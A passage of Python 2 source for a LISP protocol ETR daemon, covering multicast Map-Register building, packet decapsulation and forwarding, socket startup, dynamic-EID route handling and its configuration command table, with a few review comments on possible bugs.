        # Build our RLOC entry.
        #
        rloc_record = lisp.lisp_rloc_record()
        rloc_record.rloc_name = rloc_name

        #
        # Decide on RLE address. Have NAT-traversal take precedent, otherwise
        # use configured RLE in group-mapping. If one wasn't configured use
        # lisp_myrlocs IPv4 address.
        #
        if (translated_rloc != None):
            rle_node.address = translated_rloc
        elif (rle_addr != None):
            rle_node.address = rle_addr
        else:
            rle_node.address = rle_addr = lisp.lisp_myrlocs[0]
        #endif

        rloc_record.rle = rle
        rloc_record.local_bit = True
        rloc_record.reach_bit = True
        rloc_record.priority = 255
        rloc_record.weight = 0
        rloc_record.mpriority = 1
        rloc_record.mweight = 100
        eid_records += rloc_record.encode()
        rloc_record.print_record(" ")

        #
        # If we are doing NAT-traversal, include a set or RTR RLOCs with
        # priority 1. And set the global RLOCs to priority 254.
        #
        for rtr in lisp.lisp_rtr_list.values():
            if (rtr == None): continue
            rloc_record = lisp.lisp_rloc_record()
            rloc_record.rloc.copy_address(rtr)
            rloc_record.priority = 254
            rloc_record.rloc_name = "RTR"
            rloc_record.weight = 0
            rloc_record.mpriority = 255
            rloc_record.mweight = 0
            rloc_record.local_bit = False
            rloc_record.reach_bit = True
            eid_records += rloc_record.encode()
            rloc_record.print_record(" RTR ")
        #endfor

        #
        # Add EID-records to correct map-server name set.
        #
        # NOTE(review): eid_records accumulates across ALL entries and the
        # send loop below appends the full eid_records buffer rather than
        # the per-map-server ms_list[key][0] bucket. This is harmless with
        # a single map-server name but looks suspect with several --
        # confirm before changing.
        #
        ms_list[ms_dns_name][0] += eid_records
    #endfor

    #
    # Build map-server independent fields.
    #
    map_register = lisp.lisp_map_register()
    map_register.nonce = 0xaabbccdddfdfdf00
    map_register.xtr_id_present = True
    map_register.proxy_reply_requested = True
    map_register.map_notify_requested = False
    map_register.merge_register_requested = True

    #
    # Send Map-Register to each configured map-server.
    #
    for ms in lisp.lisp_map_servers_list.values():
        key = ms.dns_name if decent else ms.ms_name

        #
        # Get EID-records from correct map-server name set.
        #
        if (key not in ms_list): continue

        #
        # Build map-server specific fields.
        #
        map_register.record_count = ms_list[key][1]
        if (map_register.record_count == 0): continue

        map_register.nonce += 1
        map_register.alg_id = ms.alg_id

        #
        # Fix: this previously read "map_register.alg_id = ms.key_id",
        # which clobbered alg_id and left key_id unset. See the same field
        # setup in lisp_build_map_register().
        #
        map_register.key_id = ms.key_id

        map_register.xtr_id = ms.xtr_id
        map_register.site_id = ms.site_id
        map_register.encrypt_bit = (ms.ekey != None)
        packet = map_register.encode()
        map_register.print_map_register()

        #
        # Append EID-records and encode xtr-ID and site-ID at end of
        # Map-Register.
        #
        trailer = map_register.encode_xtr_id("")
        packet = packet + eid_records + trailer

        ms.map_registers_multicast_sent += 1
        lisp.lisp_send_map_register(lisp_sockets, packet, map_register, ms)

        #
        # Do DNS lookup for Map-Server if "dns-name" configured.
        #
        ms.resolve_dns_name()

        #
        # Go build more EID-records.
        #
        time.sleep(.001)
    #endfor
    return
#enddef
#
# lisp_etr_data_plane
#
# Capture a LISP encapsulated packet, decap it, process inner header, and
# re-encapsulated it.
#
def lisp_etr_data_plane(parms, not_used, packet):
    """pcap callback: decapsulate and forward a received LISP data packet.

    parms    -- [device-name, raw-socket] as supplied to pcap.loop().
    not_used -- unused pcap callback argument.
    packet   -- captured packet bytes starting at the link-level header
                (Python2 str; single-byte indexing below assumes this).
    """
    global lisp_ipc_listen_socket, lisp_send_sockets

    device = parms[0]
    lisp_raw_socket = parms[1]

    #
    # Jump over MAC header if packet received on interface. There is a 4-byte
    # internal header in any case (loopback interfaces will have a 4 byte
    # header)..
    #
    if (lisp.lisp_is_macos() == False):
        offset = 4 if device == "lo0" else 16
        packet = packet[offset::]
    #endif

    #
    # Check IGMP packet. Byte 9 is the IPv4 protocol field; protocol 2 is
    # IGMP. A non-bool return from lisp_process_igmp_packet() is a list of
    # (source, group, joinleave) entries to register.
    #
    protocol = struct.unpack("B", packet[9])[0]
    if (protocol == 2):
        entries = lisp.lisp_process_igmp_packet(packet)
        if (type(entries) != bool):
            lisp_send_multicast_map_register(lisp_send_sockets, entries)
            return
        #endif
    #endif

    #
    # Check RLOC-probe Map-Request. We need to grab the TTL from IP header.
    #
    orig_packet = packet
    packet, source, port, ttl = lisp.lisp_is_rloc_probe(packet, 0)
    if (orig_packet != packet):
        if (source == None): return
        lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port, ttl)
        return
    #endif

    #
    # First check if we are assembling IPv4 fragments. Do this only when
    # not doing NAT-traversal. Otherwise, the kernel will do it when we
    # receive the same packet on a raw socket (in lisp_etr_nat_data_plane()).
    #
    sport = socket.ntohs(struct.unpack("H", packet[20:22])[0])
    if (lisp.lisp_nat_traversal and sport == lisp.LISP_DATA_PORT): return
    packet = lisp.lisp_reassemble(packet)
    if (packet == None): return

    packet = lisp.lisp_packet(packet)
    status = packet.decode(True, lisp_ipc_listen_socket, lisp.lisp_decap_stats)
    if (status == None): return

    #
    # Print some useful header fields.
    #
    packet.print_packet("Receive", True)

    #
    # If we are looping back Map-Registers via encapsulation, overwrite
    # multicast address with source address. That means we are sending a
    # Map-Register message to the lisp-core process from our local RLOC
    # address to our local RLOC address. Also, zero out the UDP checksum
    # since the destination address changes that affects the pseudo-header.
    #
    if (lisp.lisp_decent_push_configured and
        packet.inner_dest.is_multicast_address() and \
        packet.lisp_header.get_instance_id() == 0xffffff):
        source = packet.inner_source.print_address_no_iid()
        packet.strip_outer_headers()
        packet = packet.packet[28::]
        packet = lisp.lisp_packet_ipc(packet, source, sport)
        lisp.lisp_ipc(packet, lisp_ipc_listen_socket, "lisp-ms")
        return
    #endif

    #
    # Check if inner packet is a LISP control-packet. Typically RLOC-probes
    # from RTRs can come through NATs. We want to reply to the global address
    # of the RTR which is the outer source RLOC. We don't care about the
    # inner source port since the RTR will decapsulate a data encapsulated
    # RLOC-probe Map-Reply. The inner LISP header begins at offset 20+16+28=64
    # (outer-IPv4 + UDP-outer-LISP + inner-IPv4-UDP).
    #
    if (packet.lisp_header.get_instance_id() == 0xffffff):
        inner_ip = packet.packet[36::]
        inner_lisp = inner_ip[28::]
        ttl = -1
        if (lisp.lisp_is_rloc_probe_request(inner_lisp[0])):
            # Byte 8 of the inner IP header is its TTL; decrement for reply.
            ttl = struct.unpack("B", inner_ip[8])[0] - 1
        #endif
        source = packet.outer_source.print_address_no_iid()
        lisp.lisp_parse_packet(lisp_send_sockets, inner_lisp, source, 0, ttl)
        return
    #endif

    #
    # Packets are arriving on pcap interface. Need to check if another data-
    # plane is running. If so, don't deliver duplicates.
    #
    if (lisp.lisp_ipc_data_plane):
        lisp.dprint("Drop packet, external data-plane active")
        return
    #endif

    #
    # Increment global stats.
    #
    lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))

    #
    # Strip outer headers and start inner header forwarding logic.
    #
    packet.strip_outer_headers()
    f_or_b = lisp.bold("Forward", False)

    #
    # Process inner header (checksum and decrement ttl).
    #
    igmp = False
    L2 = packet.inner_dest.is_mac()
    if (L2):
        packet.packet = lisp.lisp_mac_input(packet.packet)
        if (packet.packet == None): return
        f_or_b = lisp.bold("Bridge", False)
    elif (packet.inner_version == 4):
        igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet)
        if (packet.packet == None): return
        if (igmp):
            # Decapsulated IGMP report: turn it into multicast registrations.
            entries = lisp.lisp_process_igmp_packet(packet.packet)
            if (type(entries) != bool):
                lisp_send_multicast_map_register(lisp_send_sockets, entries)
                return
            #endif
        #endif
        packet.inner_ttl = packet.outer_ttl
    elif (packet.inner_version == 6):
        packet.packet = lisp.lisp_ipv6_input(packet)
        if (packet.packet == None): return
        packet.inner_ttl = packet.outer_ttl
    else:
        lisp.dprint("Cannot parse inner packet header")
        return
    #endif

    #
    # Check if database-mapping exists for our local destination. When the
    # destination is a multicast address, check if the source is our EID.
    # That means we sent to a group we are members of. If using an RTR,
    # it can't tell since the source RLOC could be rewritten by a NAT so
    # the ETR must process the packet. If it decaps, the ITR on this system
    # will pcap it and encap again. This will happen until the TTL reaches 0.
    #
    if (packet.inner_dest.is_multicast_address() == False):
        db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
        if (db):
            db.increment_decap_stats(packet)
        else:
            lisp.dprint("No database-mapping found for EID {}".format( \
                lisp.green(packet.inner_dest.print_address(), False)))
            return
        #endif
    else:
        if (lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)):
            lisp.dprint("Discard echoed multicast packet (through NAT)")
            return
        #endif
    #endif

    #
    # If this is a trace packet, lisp_trace_append() will swap addresses
    # and send packet back to source. We have no app to forward this decap'ed
    # packet to, so return.
    #
    if (packet.is_trace()):
        if (lisp.lisp_trace_append(packet, ed="decap") == False): return
    #endif

    #
    # We are going to forward or bridge the decapsulated packet.
    #
    addr_str = "{} -> {}".format(packet.inner_source.print_address(),
        packet.inner_dest.print_address())
    lisp.dprint("{} packet for EIDs {}: {} ...".format(f_or_b, \
        lisp.green(addr_str, False),
        lisp.lisp_format_packet(packet.packet[0:60])))

    #
    # If we are decapsulating a MAC frame, then use the L2 socket where
    # the MAC header is already in packet.
    #
    if (L2):
        packet.bridge_l2_packet(packet.inner_dest, db)
        return
    #endif

    #
    # Send on L2 socket since IPv6 raw sockets do not allow us to send an
    # entire IPv6 header in payload. Prepend prebuilt MAC header.
    #
    if (packet.inner_version == 6):
        packet.send_l2_packet(lisp_l2_socket, lisp_mac_header)
        return
    #endif

    #
    # Default to global raw socket otherwise get socket based on instance-ID.
    #
    raw_socket = packet.get_raw_socket()
    if (raw_socket == None): raw_socket = lisp_raw_socket

    #
    # Send out.
    #
    packet.send_packet(raw_socket, packet.inner_dest)
    return
#enddef
#
# lisp_etr_nat_data_plane
#
# Packet came in on a destination ephemeral port from a source port of 4341.
# That is a RTR encapsulated this packet that is coming through a NAT device.
#
# The packet has the outer IP and UDP headers stripped so the first byte of
# this supplied data packet has the LISP data header on it.
#
def lisp_etr_nat_data_plane(lisp_raw_socket, packet, source):
    """Decapsulate and forward a NAT-traversed LISP data packet.

    lisp_raw_socket -- raw socket used to forward the inner packet.
    packet          -- received bytes beginning with the LISP data header
                       (outer IP/UDP already stripped by the kernel).
    source          -- outer source RLOC address string.
    """
    global lisp_ipc_listen_socket, lisp_send_sockets

    #
    # Decode LISP header.
    #
    lisp_header = packet
    packet = lisp.lisp_packet(packet[8::])
    if (packet.lisp_header.decode(lisp_header) == False): return

    #
    # Store outer source RLOC address so if we are doing lisp-crypto across
    # NAT-traversal, we can find the decryption key.
    #
    packet.outer_source = lisp.lisp_address(lisp.LISP_AFI_IPV4, source,
        lisp.LISP_IPV4_HOST_MASK_LEN, 0)

    status = packet.decode(False, lisp_ipc_listen_socket,
        lisp.lisp_decap_stats)
    if (status == None): return

    #
    # Special case to log packets with no outer header but are considered
    # decapsulated when coming through NATs. Since packets are sent from
    # source port 4341, the kernel will strip outer header, so we don't have
    # outer header context in lisp_packet().
    #
    if (lisp.lisp_flow_logging): packet.log_flow(False)

    packet.print_packet("Kernel-decap", False)
    lisp.dprint(packet.lisp_header.print_header(" "))

    #
    # If we are looping back Map-Registers via encapsulation, overwrite
    # multicast address with source address. That means we are sending a
    # Map-Register message to the lisp-core process from our local RLOC
    # address to our local RLOC address. Also, zero out the UDP checksum
    # since the destination address changes that affects the pseudo-header.
    #
    if (lisp.lisp_decent_push_configured and
        packet.inner_dest.is_multicast_address() and \
        packet.lisp_header.get_instance_id() == 0xffffff):
        sport = packet.udp_sport
        packet = packet.packet[28::]
        packet = lisp.lisp_packet_ipc(packet, source, sport)
        lisp.lisp_ipc(packet, lisp_ipc_listen_socket, "lisp-ms")
        return
    #endif

    #
    # Check if inner packet is a LISP control-packet. Typically RLOC-probes
    # from RTRs can come through NATs. We want to reply to the global address
    # of the RTR which is the outer source RLOC. We don't care about the
    # inner source port since the RTR will decapsulate a data encapsulated
    # RLOC-probe Map-Reply.
    #
    if (packet.lisp_header.get_instance_id() == 0xffffff):
        inner_ip = packet.packet
        inner_lisp = inner_ip[28::]
        ttl = -1
        if (lisp.lisp_is_rloc_probe_request(inner_lisp[0])):
            # Byte 8 of the inner IP header is its TTL; decrement for reply.
            ttl = struct.unpack("B", inner_ip[8])[0] - 1
        #endif
        lisp.lisp_parse_packet(lisp_send_sockets, inner_lisp, source, 0, ttl)
        return
    #endif

    #
    # Packets are arriving on ephemeral socket. Need to check if another data-
    # plane is running. If so, don't deliver duplicates.
    #
    if (lisp.lisp_ipc_data_plane):
        lisp.dprint("Drop packet, external data-plane active")
        return
    #endif

    #
    # Increment global stats.
    #
    lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))

    #
    # Check if database-mapping exists for our local destination. When the
    # destination is a multicast address, check if the source is our EID.
    # That means we sent to a group we are members of. If using an RTR,
    # it can't tell since the source RLOC could be rewritten by a NAT so
    # the ETR must process the packet. If it decaps, the ITR on this system
    # will pcap it and encap again. This will happen until the TTL reaches 0.
    #
    if (packet.inner_dest.is_multicast_address() == False):
        db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
        if (db):
            db.increment_decap_stats(packet)
        else:
            # NOTE(review): unlike lisp_etr_data_plane(), this branch does
            # not return, so the packet is still forwarded below even with
            # no database-mapping -- confirm this is intentional.
            lisp.dprint("No database-mapping found for EID {}".format( \
                lisp.green(packet.inner_dest.print_address(), False)))
        #endif
    else:
        if (lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)):
            lisp.dprint("Discard echoed multicast packet")
            return
        #endif
    #endif

    #
    # If this is a trace packet, lisp_trace_append() will swap addresses
    # and send packet back to source. We have no app to forward this decap'ed
    # packet to, so return.
    #
    if (packet.is_trace()):
        if (lisp.lisp_trace_append(packet, ed="decap") == False): return
    #endif

    addr_str = "{} -> {}".format(packet.inner_source.print_address(),
        packet.inner_dest.print_address())
    lisp.dprint("{} packet for EIDs {}: {} ...".format( \
        lisp.bold("NAT-Forward", False), lisp.green(addr_str, False),
        lisp.lisp_format_packet(packet.packet[0:60])))

    #
    # Send on L2 socket since IPv6 raw sockets do not allow us to send an
    # entire IPv6 header in payload. Prepend prebuilt MAC header
    #
    if (packet.inner_version == 6):
        packet.send_l2_packet(lisp_l2_socket, lisp_mac_header)
        return
    #endif

    #
    # Default to global raw socket otherwise get socket based on instance-ID.
    #
    raw_socket = packet.get_raw_socket()
    if (raw_socket == None): raw_socket = lisp_raw_socket

    #
    # Send out on raw socket.
    #
    packet.send_packet(raw_socket, packet.inner_dest)
    return
#enddef
#
# lisp_register_ipv6_group_entries
#
# Find an IPv6 group-mapping for 'group' and send a Map-Register for each
# configured IPv6 source of the matched group-prefix.
#
def lisp_register_ipv6_group_entries(group, joinleave):
    gm = lisp.lisp_lookup_group(group)
    if (gm == None): return

    sg_entries = [[source, group, joinleave] for source in gm.sources]
    lisp_send_multicast_map_register(lisp_send_sockets, sg_entries)
    return
#enddef
#
# lisp_etr_join_leave_process
#
# Poll the file-system for join/leave requests. A file named "join-<group>"
# in the current directory means join <group>; a matching "leave-<group>"
# file means leave it. For IPv4 groups an IP/IGMPv2 Report or Leave packet
# is synthesized and handed to lisp.lisp_process_igmp_packet(). IPv6 groups
# are registered directly until MLD support exists.
#
# This is used for testing and not meant for production deployment.
#
def lisp_etr_join_leave_process():
    global lisp_send_sockets

    lisp.lisp_set_exception()

    #
    # Prebuild the IP header words used for every synthesized IGMP packet.
    #
    hton = socket.htonl
    header_words = [hton(0x46000020), hton(0x9fe60000), hton(0x0102d7cc),
        hton(0x0acfc15a), hton(0xe00000fb), hton(0x94040000)]
    ip_header = ""
    for word in header_words: ip_header += struct.pack("I", word)

    #
    # Look for files in current directory for "join-<group>" and then send
    # an IGMPv2 report to ourselves.
    #
    while (True):
        groups = commands.getoutput("ls join-*").replace("join-", "")
        for group in groups.split("\n"):
            if (lisp.lisp_valid_address_format("address", group) == False):
                continue
            #endif

            #
            # A matching "leave-<group>" file means we are leaving.
            #
            leavejoin = os.path.exists("leave-{}".format(group))
            lisp.lprint("Internal {} group {}".format( \
                "leaving" if leavejoin else "joining", group))

            if (group.find(":") != -1):

                #
                # IPv6 group: register directly, but never for link-local.
                #
                if (group.lower().find("ff02:") != -1):
                    lisp.lprint("Suppress registration for link-local groups")
                    continue
                #endif
                lisp_register_ipv6_group_entries(group, (leavejoin == False))
            else:

                #
                # IPv4 group: append IGMP type (Leave 0x17, Report 0x16)
                # and the group address, then process the packet locally.
                #
                igmp_type = 0x17000000 if leavejoin else 0x16000000
                send_packet = ip_header + struct.pack("I", hton(igmp_type))

                octets = group.split(".")
                value = (int(octets[0]) << 24) + (int(octets[1]) << 16) + \
                    (int(octets[2]) << 8) + int(octets[3])
                send_packet += struct.pack("I", hton(value))

                sg = lisp.lisp_process_igmp_packet(send_packet)
                if (type(sg) != bool):
                    lisp_send_multicast_map_register(lisp_send_sockets, sg)
                #endif
                time.sleep(.100)
            #endif
        #endfor
        time.sleep(10)
    #endwhile
    return
#enddef
#
# lisp_etr_process
#
# Receive thread for LISP encapsulated packets addressed to destination
# port 4341, plus IGMP reports. IGMP capture works on Ubuntu and Fedora;
# MacOS only delivers IGMPv2 when listening on "en0".
#
def lisp_etr_process():
    lisp.lisp_set_exception()
    if (lisp.lisp_myrlocs[0] == None): return

    #
    # Include all multicast RLEs so packets to underlay multicast groups
    # are captured too.
    #
    rles = lisp.lisp_get_all_multicast_rles()

    #
    # Use "en0" instead of "any" when doing IGMP testing on MacOS.
    #
    device = "any"
    pcap = pcappy.open_live(device, 1600, 0, 100)

    #
    # Build the BPF filter: IGMP (proto 2), or packets to one of our
    # addresses/RLEs that are LISP/VXLAN data, RLOC-probes, or fragments.
    #
    targets = lisp.lisp_get_all_addresses() + rles
    pfilter = "(proto 2) or ((dst host "
    pfilter += " or ".join(["{}".format(addr) for addr in targets])
    pfilter += ") and ((udp dst port 4341 or 8472 or 4789) or "
    pfilter += "(udp src port 4341) or "
    pfilter += "(udp dst port 4342 and ip[28] == 0x12) or "
    pfilter += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + \
        "(ip[6]&0xe0 == 0 and ip[7] != 0)))))"

    lisp.lprint("Capturing packets for: '{}' on device {}".format(pfilter,
        device))
    pcap.filter = pfilter

    #
    # Enter receive loop; packets are handed to lisp_etr_data_plane().
    #
    pcap.loop(-1, lisp_etr_data_plane, [device, lisp_raw_socket])
    return
#enddef
#
# lisp_etr_startup
#
# Intialize this LISP ETR process. This function returns no values.
#
def lisp_etr_startup():
    """Initialize the lisp-etr process: discover local addresses, open all
    sockets (ephemeral, IPC, send, raw, tuntap) and start the data-plane
    and join/leave threads. Returns True on success, False when no local
    addresses can be determined.
    """
    global lisp_ipc_listen_socket
    global lisp_ephem_socket
    global lisp_send_sockets
    global lisp_raw_socket
    global lisp_l2_socket
    global lisp_mac_header

    lisp.lisp_i_am("etr")
    lisp.lisp_set_exception()
    lisp.lisp_print_banner("ETR starting up")

    #
    # Get local address for source RLOC for encapsulation.
    #
    lisp.lisp_get_local_interfaces()
    lisp.lisp_get_local_macs()
    if (lisp.lisp_get_local_addresses() == False): return(False)

    #
    # Prebuild MAC header for lisp_l2_socket sending. Disabled code in favor
    # of using pytun. See below.
    #
    # m = lisp.lisp_mymacs.keys()[0]
    # mac = ""
    # for i in range(0, 12, 2): mac += chr(int(m[i:i+2], 16))
    # lisp_mac_header = mac + mac + "\x86\xdd"
    # lisp.dprint("Built MAC header for L2 socket:",
    #     lisp.lisp_format_packet(lisp_mac_header))

    #
    # Used on for listening for Info-Replies for NAT-traversal support.
    #
    s = lisp.lisp_open_listen_socket("0.0.0.0", str(lisp_ephem_port))
    s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)
    lisp_ephem_socket = s

    #
    # Open network send socket and internal listen socket.
    #
    lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-etr")
    lisp_send_sockets[0] = lisp_ephem_socket
    lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
    lisp_send_sockets[2] = lisp_ipc_listen_socket

    #
    # Open up raw socket so we can send with IP headers after decapsulation.
    # There is a special case where the RTR's lisp_send_sockets array is of
    # size 4 since we need to pass the raw socket through the lisp.py module
    # to send a data encapsulated RLOC-probe to an ETR that sits behind a NAT.
    # The test is in lisp_send_map_request() for this. This is the case in
    # ETRs as well. All other components use an array size of 3 modulo.
    #
    lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
        socket.IPPROTO_RAW)
    lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
    lisp_send_sockets.append(lisp_raw_socket)

    #
    # Open a L2 socket so when we decapsulate and have to route an IPv6
    # packet, we have the kernel receive a MAC frame on the loopback interface.
    # We do this because there is no IP_HDRINCL for IPv6 raw sockets.
    #
    # Disabling this code in favor of using a tuntap tun interface via the
    # pytun module. See code right below.
    #
    # if ("PF_PACKET" in dir(socket)):
    #     interface = "lo" if ("lo" in lisp.lisp_myinterfaces.keys()) else \
    #         "lo0" if ("lo0" in lisp.lisp_myinterfaces.keys()) else None
    #     if (interface != None):
    #         lisp_l2_socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
    #         lisp_l2_socket.bind(("lo", 0x86dd))
    #     #endif
    # #endif

    #
    # Setup tuntap tunnel interface so when we decap IPv6 packets, we can
    # send to kernel to route them. The 4-byte tun header declares an IPv6
    # payload (EtherType 0x86dd).
    #
    if (pytun != None):
        lisp_mac_header = '\x00\x00\x86\xdd'
        device = "lispers.net"
        try:
            lisp_l2_socket = pytun.TunTapDevice(flags=pytun.IFF_TUN,
                name=device)
            os.system("ip link set dev {} up".format(device))
        except:
            lisp.lprint("Cannot create tuntap interface")
        #endtry
    #endif

    #
    # Start thread to listen on data socket.
    #
    threading.Thread(target=lisp_etr_process, args=[]).start()

    #
    # Test code to force IGMPv2 joins and leaves on an airplane. ;-)
    #
    threading.Thread(target=lisp_etr_join_leave_process, args=[]).start()
    return(True)
#enddef
#
# lisp_etr_shutdown
#
# Shut down this process.
#
def lisp_etr_shutdown():

    #
    # Need write access to the timer globals so the cancelled state sticks.
    #
    global lisp_register_timer
    global lisp_etr_info_timer

    #
    # Cancel the periodic Map-Register and Info-Request timer threads, if
    # either one is currently armed.
    #
    for timer in (lisp_register_timer, lisp_etr_info_timer):
        if (timer): timer.cancel()
    #endfor

    #
    # Close the send sockets and the internal IPC listen socket.
    #
    lisp.lisp_close_socket(lisp_send_sockets[0], "")
    lisp.lisp_close_socket(lisp_send_sockets[1], "")
    lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-etr")
    return
#enddef
#
# lisp_etr_discover_eid
#
# Process IPC message from the lisp-itr process. It will be in the form of:
#
# "learn%<eid-string>%<interface-name>"
#
def lisp_etr_discover_eid(ipc):

    #
    # IPC format is "learn%<eid-string>%<interface-name>"; interface-name is
    # the literal string "None" when the EID moved away.
    #
    ipc = ipc.split("%")
    eid_str = ipc[1]
    interface = ipc[2]
    if (interface == "None"): interface = None

    eid = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
    eid.store_address(eid_str)

    #
    # Do database-mapping lookup. Only proceed when a dynamic-EID capable
    # database-mapping entry covers this EID.
    #
    db = lisp.lisp_db_for_lookups.lookup_cache(eid, False)
    if (db == None or db.dynamic_eid_configured() == False):
        lisp.lprint("ITR/ETR dynamic-EID configuration out of sync for {}". \
            format(lisp.green(eid_str, False)))
        return
    #endif

    #
    # Do logic checks. That is do not remove an entry if it is not there and
    # don't try to add an entry if it is already cached.
    #
    dyn_eid = None
    if (db.dynamic_eids.has_key(eid_str)): dyn_eid = db.dynamic_eids[eid_str]
    if (dyn_eid == None and interface == None):
        lisp.lprint("ITR/ETR state mismatch for {}".format( \
            lisp.green(eid_str, False)))
        return
    #endif

    #
    # Check if ITR is changing the interface to the same interface, meaning
    # it is confused. Otherwise, the IPC is an interface change. Don't register
    # in this case.
    #
    if (dyn_eid and interface):
        if (dyn_eid.interface == interface):
            lisp.lprint("ITR sent redundant IPC for {}".format( \
                lisp.green(eid_str, False)))
        else:
            lisp.lprint("Dynamic-EID {} interface change, {} -> {}".format( \
                lisp.green(eid_str, False), dyn_eid.interface, interface))
            dyn_eid.interface = interface
        #endif
        return
    #endif

    #
    # Add new entry and register it.
    #
    if (interface):
        dyn_eid = lisp.lisp_dynamic_eid()
        dyn_eid.dynamic_eid.copy_address(eid)
        dyn_eid.interface = interface
        dyn_eid.get_timeout(interface)
        db.dynamic_eids[eid_str] = dyn_eid

        reg = lisp.bold("Registering", False)
        eid_str = lisp.bold(eid_str, False)
        lisp.lprint("{} dynamic-EID {} on interface {}, timeout {}".format(reg,
            lisp.green(eid_str, False), interface, dyn_eid.timeout))

        lisp_build_map_register(lisp_send_sockets, None, eid, None, False)

        #
        # Add /32 to routing table (Linux only; macOS has no "ip route").
        #
        if (lisp.lisp_is_macos() == False):
            eid_str = eid.print_prefix_no_iid()
            cmd = "ip route add {} dev {}".format(eid_str, interface)
            os.system(cmd)
        #endif
        return
    #endif

    #
    # Remove existing entry and deregister it (ttl 0 Map-Register).
    #
    if (db.dynamic_eids.has_key(eid_str)):
        interface = db.dynamic_eids[eid_str].interface

        dereg = lisp.bold("Deregistering", False)
        lisp.lprint("{} dynamic-EID {}".format(dereg,
            lisp.green(eid_str, False)))

        lisp_build_map_register(lisp_send_sockets, 0, eid, None, False)
        db.dynamic_eids.pop(eid_str)

        #
        # Delete /32 from routing table (Linux only).
        #
        if (lisp.lisp_is_macos() == False):
            eid_str = eid.print_prefix_no_iid()
            cmd = "ip route delete {} dev {}".format(eid_str, interface)
            os.system(cmd)
        #endif
    #endif
    return
#enddef
#
# lisp_etr_process_rtr_updown
#
# Process IPC message from lisp-itr. It is telling the lisp-etr process if
# RLOC-probing has determined if the RTR has gone up or down. And therefore
# if it should be registered to the mapping system.
#
def lisp_etr_process_rtr_updown(ipc):

    #
    # When we register all RTRs regardless of reachability, this IPC is a
    # no-op. IPC format is "rtr%<rtr-address>%<up-or-down>".
    #
    if (lisp.lisp_register_all_rtrs): return

    opcode, rtr_str, status = ipc.split("%")
    if (lisp.lisp_rtr_list.has_key(rtr_str) == False): return

    lisp.lprint("Process ITR IPC message, RTR {} has gone {}".format(
        lisp.red(rtr_str, False), lisp.bold(status, False)))

    #
    # RTR went down, clear its entry so it is no longer registered.
    #
    if (status == "down"):
        lisp.lisp_rtr_list[rtr_str] = None
        return
    #endif

    #
    # RTR came up, store a fresh address entry. (The original code also
    # fetched the old entry into a local variable first; that value was
    # never used on any path, so the dead read has been removed.)
    #
    rtr = lisp.lisp_address(lisp.LISP_AFI_IPV4, rtr_str, 32, 0)
    lisp.lisp_rtr_list[rtr_str] = rtr
    return
#enddef
#
# lisp_etr_process_nonce_ipc
#
# Process an nonce IPC message from the ITR. It wants to know when a nonce
# is echoed from a remote ITR.
#
def lisp_etr_process_nonce_ipc(ipc):

    #
    # IPC format is "nonce%<R-or-E>%<rloc-string>%<hex-nonce>".
    #
    fields = ipc.split("%")
    opcode = fields[1]
    rloc_str = fields[2]
    nonce = int(fields[3], 16)

    #
    # Find existing echo-nonce state for this RLOC, or create it.
    #
    echo_nonce = lisp.lisp_get_echo_nonce(None, rloc_str)
    if (echo_nonce == None): echo_nonce = lisp.lisp_echo_nonce(rloc_str)

    #
    # "R" records a request-nonce we sent and now wait to see echoed;
    # "E" records a nonce we echoed back to the remote ITR.
    #
    if (opcode == "R"):
        echo_nonce.request_nonce_sent = nonce
        lisp.lprint("Waiting for echo-nonce 0x{} from {}".format( \
            lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False)))
    elif (opcode == "E"):
        echo_nonce.echo_nonce_sent = nonce
        lisp.lprint("Sent echo-nonce 0x{} to {}".format( \
            lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False)))
    #endif
    return
#enddef
#
# ETR commands procssed by this process.
#
# Command table: maps CLI clause name to [handler-function, {parameter-name :
# [single-valued?, allowed/range values...]}]. Dispatched by
# lispconfig.lisp_process_command() for the "lisp-etr" process.
lisp_etr_commands = {
    "lisp xtr-parameters" : [lispconfig.lisp_xtr_command, {
        "rloc-probing" : [True, "yes", "no"],
        "nonce-echoing" : [True, "yes", "no"],
        "data-plane-security" : [True, "yes", "no"],
        "data-plane-logging" : [True, "yes", "no"],
        "frame-logging" : [True, "yes", "no"],
        "flow-logging" : [True, "yes", "no"],
        "nat-traversal" : [True, "yes", "no"],
        "checkpoint-map-cache" : [True, "yes", "no"],
        "ipc-data-plane" : [True, "yes", "no"],
        "decentralized-push-xtr" : [True, "yes", "no"],
        "decentralized-pull-xtr-modulus" : [True, 1, 0xff],
        "decentralized-pull-xtr-dns-suffix" : [True],
        "register-reachable-rtrs" : [True, "yes", "no"],
        "program-hardware" : [True, "yes", "no"] }],

    "lisp interface" : [lispconfig.lisp_interface_command, {
        "interface-name" : [True],
        "device" : [True],
        "instance-id" : [True, 0, 0xffffffff],
        "dynamic-eid" : [True],
        "dynamic-eid-device" : [True],
        "lisp-nat" : [True, "yes", "no"],
        "dynamic-eid-timeout" : [True, 0, 0xff] }],

    "lisp map-server" : [lisp_map_server_command, {
        "ms-name" : [True],
        "address" : [True],
        "dns-name" : [True],
        "authentication-type" : [False, "sha1", "sha2"],
        "authentication-key" : [False],
        "encryption-key" : [False],
        "proxy-reply" : [False, "yes", "no"],
        "want-map-notify" : [False, "yes", "no"],
        "merge-registrations" : [False, "yes", "no"],
        "refresh-registrations" : [False, "yes", "no"],
        "site-id" : [False, 1, 0xffffffffffffffff] }],

    "lisp database-mapping" : [lisp_etr_database_mapping_command, {
        "prefix" : [],
        "mr-name" : [True],
